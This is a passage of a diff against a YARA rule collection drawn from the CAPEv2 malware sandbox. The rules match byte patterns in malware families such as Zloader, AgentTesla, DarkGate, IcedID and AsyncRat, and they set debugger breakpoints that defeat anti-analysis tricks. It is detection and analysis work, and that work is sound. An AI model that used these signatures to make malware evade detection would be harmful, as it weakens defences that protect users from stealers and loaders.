Bypass" + author = "kevoreilly" + id = "8a8e7102-1138-59e7-95a6-8647d41d8521" + date = "2024-05-03" + modified = "2024-05-03" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Zloader.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "319adca805083c7f5854fe840447cf961addbd748f1f25eb8ec8cdeed7af38aa" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$trap1-5,action0=hooks:0,bp1=$traps-108,action1=jmp:15,bp2=$traps-88,action2=hooks:1,count=0" - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + strings: + $trap1 = {81 F7 4C 01 00 00 8D B4 37 [2] FF FF 31 FE 69 FE 95 03 00 00 E8 [4] 31 FE 0F AF FE 0F AF FE E8} + $traps = {6A 44 53 E8 [2] FF FF 83 C4 08 8D 85 ?? FF FF FF C7 85 ?? FF FF FF 44 00 00 00 50} - 16. Limitation of Liability. + condition: + uint16(0)==0x5A4D and any of them +} +rule CAPE_Zloader_2024 : FILE +{ + meta: + description = "Zloader Registry and Modulename Bypass" + author = "enzok" + id = "7100c27e-021f-552c-9a75-84b07a2f837e" + date = "2024-05-03" + modified = "2024-05-03" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Zloader.yar#L14-L26" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "38d555ef5f613cf7ca043697c479100a7a22e7f043acf8b6a46f8009eb92fd7e" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$reg_1*+1,bp0=$reg_2*+1,action0=seteax:1,count=0" - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. + strings: + $reg_1 = {FF D0 83 F8 00 0F 94 C0 24 01 88 44 24 ?? 4? 8B [3] B? [9-25] E8 [4] 4? 89 F1 FF D0 8A [3] 24 01 0F B6 C0} + $reg_2 = {B9 [4] E8 [4] 8B [3] 89 C2 E8 [4] 4? [4] ff D0 8A [3] 24 01 0F B6 C0} + $name_1 = {56 5? 5? 4? 81 EC [4] C7 44 24 ?? 00 00 00 00 4? 8D 0D [4] E8 [4] 4? 89 [3] 4? 83 [3] 00 75} - 17. Interpretation of Sections 15 and 16. + condition: + uint16(0)==0x5A4D and 2 of them +} +rule CAPE_Vbcrypter +{ + meta: + description = "VBCrypter anti-hook Bypass" + author = "kevoreilly" + id = "2e010dfd-5096-5e81-af9b-174322a47d87" + date = "2021-03-28" + modified = "2021-03-28" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/VBCrypter.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "a62bca62ab624ab1a2c2e612c5b7e6d543006026a49c07c46800499e31e41c4e" + score = 75 + quality = 70 + tags = "" + cape_options = "bp0=$antihook-12,action0=jmp,count=0" - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. + strings: + $antihook = {43 39 C3 0F 84 ?? 00 00 00 80 3B B8 75 ?? 83 7B 01 00 75 ?? 80 7B 05 BA 75 ?? 8B 53 06 83 C3 0A 31 C9} - END OF TERMS AND CONDITIONS + condition: + any of them +} +rule CAPE_Buerloader : FILE +{ + meta: + description = "BuerLoader RDTSC Trap Bypass" + author = "kevoreilly" + id = "38f01199-6bd2-5519-b570-8c0f46e74286" + date = "2021-03-13" + modified = "2021-03-13" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/BuerLoader.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "6f9f9b4c01251c0643c61701084cca2bdfeea08ca95f982355565cf05483d940" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$trap+43,action0=skip,count=0" -The file UserDB.txt is copyrighted by BoB / Team PEiD distributed under the following -MIT license. + strings: + $trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31} -Permission is hereby granted, free of charge, to any person obtaining a copy of this -software and associated documentation files (the "Software"), to deal in the Software -without restriction, including without limitation the rights to use, copy, modify, -merge, publish, distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to the following -conditions: + condition: + uint16(0)==0x5A4D and any of them +} +rule CAPE_Agentteslav4Jit +{ + meta: + description = "AgentTesla V4 JIT native config extractor" + author = "kevoreilly" + id = "a87dca44-4974-543c-9565-487ed99be2a6" + date = "2024-02-27" + modified = "2024-02-27" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/AgentTesla.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "8f7144d2a989ce8d291af926b292f5f0f7772e707b0e49797eba13ecf91b90bc" + score = 75 + quality = 70 + tags = "" + cape_options = "bp0=$decode1+8,count=0,action0=string:ecx,typestring=AgentTesla Strings,no-logs=2" + packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c" -The above copyright notice and this permission notice shall be included in all copies -or substantial portions of the Software. + strings: + $decode1 = {8B 01 8B 40 3C FF 50 10 8B C8 E8 [4] 89 45 CC B8 1A 00 00 00} + $decode2 = {83 F8 18 75 2? 8B [2-5] D1 F8} + $decode3 = {8D 4C 0? 08 0F B6 01 [0-3] 0F B6 5? 04 33 C2 88 01 B8 19 00 00 00} -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, -INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR -PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE -FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR -OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER -DEALINGS IN THE SOFTWARE. + condition: + 2 of them +} +rule CAPE_Agentteslav3Jit +{ + meta: + description = "AgentTesla V3 JIT native string decryption" + author = "ClaudioWayne" + id = "590c5058-c1db-5366-8db5-57449a178999" + date = "2024-02-27" + modified = "2024-02-27" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/AgentTesla.yar#L16-L26" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "62a49cf4295df637f96ba7c127cfc4aeb9af2fcced497fdf34d726a062edc1ec" + score = 75 + quality = 70 + tags = "" + cape_options = "bp0=$decode+20,count=0,action0=string:eax+8,typestring=AgentTesla Strings,no-logs=2" -The file jquery.js is copyrighted by John Resig and dual licensed under the MIT or GPL -Version 2 licenses (see: http://jquery.org/license). + strings: + $decode = {8B C8 57 FF 75 08 8B [5] 8B 01 8B 40 3C FF [2] 8B F0 B8 03 00 00 00} -The files lightbox.js and lightbox.css are copyrighted by Lokesh Dhakar and licensed under -the Creative Commons Attribution 2.5 License -(see: http://creativecommons.org/licenses/by/2.5/). + condition: + all of them +} +rule CAPE_Al_Khaser : FILE +{ + meta: + description = "Al-khaser bypass" + author = "kevoreilly" + id = "6f4d9e0d-6daa-5c7e-b701-62896d866934" + date = "2022-06-09" + modified = "2022-06-09" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Al-khaser.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "45b6f2b3a925a99cd28e0f0d81aeaf02372018cba78f9fcfcffea24f7ae9ffff" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$print_check_result_x86,bp0=$print_check_result_x64,action0=setecx:0,count=1,no-logs=2" -The files bootstrap-fileupload.js, jasny-bootstrap.js, jasny-bootstrap.min.js, -jasny-bootstrap.css, jasny-bootstrap.min.css, jasny-bootstrap-responsive.css, -jasny-bootstrap-responsive.min.css are copyrighted by Jasny BV and licensed under the Apache -License, Version 2.0. + strings: + $print_check_result_x86 = {89 45 FC 53 56 8B C1 89 95 C4 FD FF FF 89 85 C8 FD FF FF 57 6A F5 83 F8 01 75 47 FF 15 [4] 8B D8 8D 8D E4 FD FF FF BA 16 00 00 00 66 90} + $print_check_result_x64 = {48 89 84 24 50 02 00 00 8B F1 83 F9 01 B9 F5 FF FF FF 48 8B EA 75 41 FF 15 [4] 48 8D 7C 24 30 B9 16 00 00 00 48 8B D8} -The files bootstrap.min.js, bootstrap.min.css, bootstrap-responsive.min.css, -glyphicons-halflings.png, glyphicons-halflings-white.png are copyrighted by Twitter, Inc. -and licensed under the Apache License, Version 2.0. + condition: + uint16(0)==0x5A4D and any of ($print_check_result*) +} +rule CAPE_UPX : FILE +{ + meta: + description = "UPX dump on OEP (original entry point)" + author = "kevoreilly" + id = "aa7217ab-fbee-5bf6-a505-4acf12c60302" + date = "2024-07-22" + modified = "2024-07-22" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/UPX.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "3f1989dfaeac57cbedcd5b9ff498e09daf1b2dfb6e8901ba64c93b89d103a0b8" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$upx32*,bp0=$upx64*,hc0=1,action0=step2oep" -The file analyzer/windows/modules/amsi.py uses parts of pywintrace -(https://github.com/fireeye/pywintrace), which is copyrighted by FireEye, Inc. and licensed -under the Apache License, Version 2.0. + strings: + $upx32 = {6A 00 39 C4 75 FA 83 EC ?? E9} + $upx64 = {6A 00 48 39 C4 75 F9 48 83 EC [1-16] E9} - */ -rule CAPE_Bazar : FILE + condition: + uint16(0)==0x5A4D and any of them +} +rule CAPE_Risepro : FILE { meta: description = "No description has been set in the source file - CAPE" author = "kevoreilly" - id = "e042f180-2a82-5c93-9858-77281557dd10" - date = "2022-06-09" - modified = "2022-06-09" + id = "63d9cb19-0688-5632-8477-ce9b7e986a55" + date = "2023-12-16" + modified = "2023-12-16" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Bazar.yar#L1-L11" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "9375f59b56e47fd0b90b089afdf3be8f16f960038fc625523a2e2d5509ab099d" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/RisePro.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "1b69a1dd5961241b926605f0a015fa17149c3b2759fb077a30a22d4ddcc273f6" + logic_hash = "055ca8328923b91f93c116e4a856366356fa11155f4e9fde95da31129b51386a" score = 75 quality = 70 tags = "FILE" - cape_type = "Bazar Payload" + cape_options = "bp0=$c2+15,action0=string:edx,bp1=$c2+41,action1=string:ecx,count=1" strings: - $decode = {F7 E9 [0-2] C1 FA 0? 8B C2 C1 E8 1F 03 D0 6B C2 ?? 2B C8} - $rsa = {C7 00 52 53 41 33 48 8D 48 09 C7 40 04 00 08 00 00 4C 8D 05 [3] 00 C6 40 08 03 B8 09 00 00 00 [0-3] 48 8D 89 80 00 00 00 41 0F 10 00} + $decode1 = {8A 06 46 84 C0 75 F9 2B F1 B8 FF FF FF 7F 8B 4D ?? 8B 51 ?? 2B C2 3B C6 72 38 83 79 ?? 10 72 02 8B 09 52 51 56 53 51 FF 75 ?? 8B CF E8} + $decode2 = {8B D9 81 FF FF FF FF 7F 0F [2] 00 00 00 C7 43 ?? 0F 00 00 00 83 FF 10 73 1A 57 FF 75 ?? 89 7B ?? 53 E8 [4] 83 C4 0C C6 04 1F 00 5F 5B 5D C2 08 00} + $c2 = {FF 75 30 83 3D [4] 10 BA [4] B9 [4] 0F 43 15 [4] 83 3D [4] 10 0F 43 0D [4] E8 [4] A3} condition: - uint16(0)==0x5A4D and 2 of them + uint16(0)==0x5A4D and any of them } -rule CAPE_Smokeloader +rule CAPE_Darkgate { meta: - description = "SmokeLoader Payload" + description = "DarkGate config" + author = "enzok" + id = "ce81f452-4096-51d6-97cc-624f9fbefa86" + date = "2024-02-26" + modified = "2024-02-26" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/DarkGate.yar#L1-L17" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "c1d35921f4fc3bac681a3d5148f517dc0ec90ab8c51e267c8c6cd5b1ca3dc085" + logic_hash = "25c0e77a83676c6a18445f8df0b1f7a9148de5f64eeb532f9a4f4d4652dd8191" + score = 75 + quality = 70 + tags = "" + cape_options = "bp0=$config2+3,action0=dump:edx::1025,count=0,typestring=DarkGate Config" + + strings: + $part1 = {8B 55 ?? 8A 4D ?? 80 E1 3F C1 E1 02 8A 5D ?? 80 E3 30 81 E3 FF [3] C1 EB 04 02 CB 88 4C 10 FF FF 45 ?? 80 7D ?? 40} + $part2 = {8B 55 ?? 8A 4D ?? 80 E1 0F C1 E1 04 8A 5D ?? 80 E3 3C 81 E3 FF [3] C1 EB 02 02 CB 88 4C 10 FF FF 45 ?? 80 7D ?? 40} + $part3 = {8B 55 ?? 8A 4D ?? 80 E1 03 C1 E1 06 8A 5D ?? 80 E3 3F 02 CB 88 4C 10 FF FF 45} + $alphabet = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=" + $config1 = {B9 01 04 00 00 E8 [4] 8D 45} + $config2 = {8B 55 ?? 8D 45 ?? E8 [4] 8D 45 ?? 5? B? 06 00 00 00 B? 01 00 00 00 8B 45 ?? E8 [4] 8B 45 ?? B? [4] E8 [4] 75} + + condition: + ($alphabet) and ( any of ($part*) or all of ($config*)) +} +rule CAPE_Rdtscpantivm +{ + meta: + description = "RdtscpAntiVM bypass" author = "kevoreilly" - id = "a67e2649-72cc-5dea-aea7-8783146d2979" - date = "2023-02-06" - modified = "2023-02-06" + id = "11dc634b-1e2f-55b4-be60-98e51de42d43" + date = "2021-12-11" + modified = "2021-12-11" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/SmokeLoader.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "a2ed982f15a6c687da2fdba216868016722825edf7e8ff6a75f24d81af8276bc" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/RdtscpAntiVM.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "be0f9b52fb630730a38160f4ad2d50b6b4bea5edd82e3ea4d1e257cf7b090910" score = 75 quality = 70 tags = "" - cape_type = "SmokeLoader Payload" + cape_options = "nop-rdtscp=1" strings: - $rc4_decrypt64 = {41 8D 41 01 44 0F B6 C8 42 0F B6 [2] 41 8D 04 12 44 0F B6 D0 42 8A [2] 42 88 [2] 42 88 [2] 42 0F B6 [2] 03 CA 0F B6 C1 8A [2] 30 0F 48 FF C7 49 FF CB 75} - $rc4_decrypt32 = {47 B9 FF 00 00 00 23 F9 8A 54 [2] 0F B6 C2 03 F0 23 F1 8A 44 [2] 88 44 [2] 88 54 [2] 0F B6 4C [2] 0F B6 C2 03 C8 81 E1 FF 00 00 00 8A 44 [2] 30 04 2B 43 3B 9C 24 [4] 72 C0} - $fetch_c2_64 = {00 48 8D 05 [3] FF 48 8B CB 48 8B 14 D0 48 8B 5C 24 ?? 48 83 C4 20 5F E9} - $fetch_c2_32 = {8B 96 [2] (00|01) 00 8B CE 5E 8B 14 95 [4] E9} + $antivm = {46 0F 01 F9 [0-4] 66 0F 6E C6 F3 0F E6 C0 66 0F 2F ?? 73} condition: - 2 of them + any of them } -rule CAPE_Icedid +rule CAPE_Singlestepantihook { meta: - description = "IcedID Payload" - author = "kevoreilly, threathive" - id = "439342be-a1e6-5656-8813-5cebb0e88e98" - date = "2021-12-16" - modified = "2021-12-16" + description = "Single-step anti-hook Bypass" + author = "kevoreilly" + id = "f7aca40b-d231-543b-81f3-5f4524abab78" + date = "2021-08-26" + modified = "2021-08-26" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/IcedID.yar#L1-L18" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "e60ccbab7a360020744eba65961156ca3e2ae9cf23671014f913d71c1a96a331" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/SingleStepAntiHook.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "fc9f36b0ecc13192fe8b6caaff256ac52c1f14480223d629a38ba84e90dd0809" score = 75 - quality = 45 + quality = 70 tags = "" - cape_type = "IcedID Payload" + cape_options = "bp0=$antihook+6,action0=skip,count=0" strings: - $crypt1 = {8A 04 ?? D1 C? F7 D? D1 C? 81 E? 20 01 00 00 D1 C? F7 D? 81 E? 01 91 00 00 32 C? 88} - $crypt2 = {8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3} - $crypt3 = {41 00 8B C8 C1 E1 08 0F B6 C4 66 33 C8 66 89 4? 24 A1 ?? ?? 41 00 89 4? 20 A0 ?? ?? 41 00 D0 E8 32 4? 32} - $download1 = {8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57} - $download2 = {8B 75 ?? 8D 4D ?? 8B 7D ?? 8B D6 57 89 1E 89 1F E8 [4] 59 3D C8 00 00 00 75 05 33 C0 40 EB} - $major_ver = {0F B6 05 ?? ?? ?? ?? 6A ?? 6A 72 FF 75 0C 6A 70 50 FF 35 ?? ?? ?? ?? 8D 45 80 FF 35 ?? ?? ?? ?? 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 ?? ?? ?? ?? 83 C4 38 8B E5 5D C3} - $stage_2_request_binary = "id=" - $stage_2_request_img = ".png" + $antihook = {FF D? 83 EC 08 9C 81 0C 24 00 01 00 00 9D} condition: - any of ($crypt*,$download*,$major_ver) and all of ($stage_2_request_*) + any of them } -rule CAPE_Seduploader : FILE +rule CAPE_Syscall { meta: - description = "Seduploader decrypt function" + description = "x64 syscall instruction (direct)" author = "kevoreilly" - id = "a7152d8c-a197-5784-8a6d-453d41585df1" - date = "2022-06-09" - modified = "2022-06-09" + id = "50168784-b6d5-5956-b3fd-7c38a61cf2b2" + date = "2023-08-07" + modified = "2023-08-07" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Seduploader.yar#L1-L11" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "d70c886699169d4dafc5b063c93682a34af5667df6d293b52256ddc19ab9c516" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Syscall.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "a806d0303054b51a8eaf12531eca796fd46481cffb1210573351f06946805631" score = 75 quality = 70 - tags = "FILE" - cape_type = "Seduploader Payload" + tags = "" + cape_options = "clear,dump,sysbp=$syscall0+8,sysbp=$syscallA+10,sysbp=$syscallB+7,sysbp=$syscallC+18" strings: - $decrypt1 = {8D 0C 30 C7 45 FC 0A 00 00 00 33 D2 F7 75 FC 8A 82 ?? ?? ?? ?? 32 04 0F 88 01 8B 45 0C 40 89 45 0C 3B C3 7C DB} + $syscall0 = {4C 8B D1 B8 [2] 00 00 (0F 05|FF 25 ?? ?? ?? ??) C3} + $syscallA = {4C 8B D1 66 8B 05 [4] (0F 05|FF 25 ?? ?? ?? ??) C3} + $syscallB = {4C 8B D1 66 B8 [2] (0F 05|FF 25 ?? ?? ?? ??) C3} + $syscallC = {4C 8B D1 B8 [2] 00 00 [10] 0F 05 C3} condition: - uint16(0)==0x5A4D and any of ($decrypt*) + any of them } -rule CAPE_Buerloader : FILE +rule CAPE_Guloaderprecursor : FILE { meta: - description = "No description has been set in the source file - CAPE" - author = "kevoreilly & Rony (@r0ny_123)" - id = "95a9b4d7-db1e-50cd-bc08-01e4e4fd6dc4" - date = "2022-05-31" - modified = "2022-05-31" + description = "Guloader precursor" + author = "kevoreilly" + id = "663f89d7-a18b-5b03-a7cb-52444a887fa4" + date = "2023-10-02" + modified = "2023-10-02" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/BuerLoader.yar#L1-L12" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "05c1f008f0a2bb8232867977fb23a5ae8312f10f0637c6265561052596319c29" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Guloader.yar#L17-L28" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "ea05c352739366a03da302074b01537382ba26f7fd5049004f156e47d284f070" score = 75 quality = 70 tags = "FILE" - cape_type = "BuerLoader Payload" + cape_options = "bp0=$antidbg,action0=scan,hc0=1,count=0" strings: - $trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31} - $decode = {8A 0E 84 C9 74 0E 8B D0 2A 0F 46 88 0A 42 8A 0E 84 C9 75 F4 5F 5E 5D C2 04 00} - $op = {33 C0 85 D2 7E 1? 3B C7 7D [0-15] 40 3B C2 7C ?? EB 02} + $antidbg = {39 48 04 (0F 85 [3] ??|75 ??) 39 48 08 (0F 85 [3] ??|75 ??) 39 48 0C (0F 85 [3] ??|75 ??)} + $except = {8B 45 08 [0-3] 8B 00 [0-3] 8B 58 18 [0-20] 81 38 05 00 00 C0 0F 85 [4-7] 83 FB 00 (0F 84|74)} condition: - uint16(0)==0x5A4D and 2 of them + 2 of them and not uint16(0)==0x5A4D } -rule CAPE_Kpot : FILE +rule CAPE_Kovter : FILE { meta: - description = "Kpot Stealer" + description = "Kovter Payload" author = "kevoreilly" - id = "724fd6ac-e734-5952-b459-01cbaffdb89d" - date = "2020-10-19" - modified = "2020-10-19" + id = "3dec3c4b-4678-5ed1-a4c3-c3d9abb58b1c" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Kpot.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "75abaab9a10e8ac8808425c389238285ab9bd9cb76f0cd03cc1e35b3ea0a1b0f" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Kovter.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "888fccb8fbfbe6c05ec63bc5658b4743f8e10a96ef51b3868c2ff94afec76f2d" score = 75 quality = 70 tags = "FILE" - cape_type = "Kpot Payload" + cape_type = "Kovter Payload" strings: - $format = "%s | %s | %s | %s | %s | %s | %s | %d | %s" - $username = "username:s:" - $os = "OS: %S x%d" + $a1 = "chkok" + $a2 = "k2Tdgo" + $a3 = "13_13_13" + $a4 = "Win Server 2008 R2" condition: - uint16(0)==0x5A4D and 2 of them + uint16(0)==0x5A4D and ( all of ($a*)) } rule CAPE_Asyncrat : FILE { @@ -112433,8 +114229,8 @@ rule CAPE_Asyncrat : FILE date = "2024-05-23" modified = "2024-05-23" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AsyncRat.yar#L1-L17" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/AsyncRat.yar#L1-L17" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" logic_hash = "8f960131bb86e1c09127324bd5877364ab25e0cb37f5f9755230c7fed9094de3" score = 75 quality = 66 @@ -112462,8 +114258,8 @@ rule CAPE_Asyncrat_Kingrat date = "2024-05-23" modified = "2024-05-23" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AsyncRat.yar#L19-L40" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/AsyncRat.yar#L19-L40" + license_url = 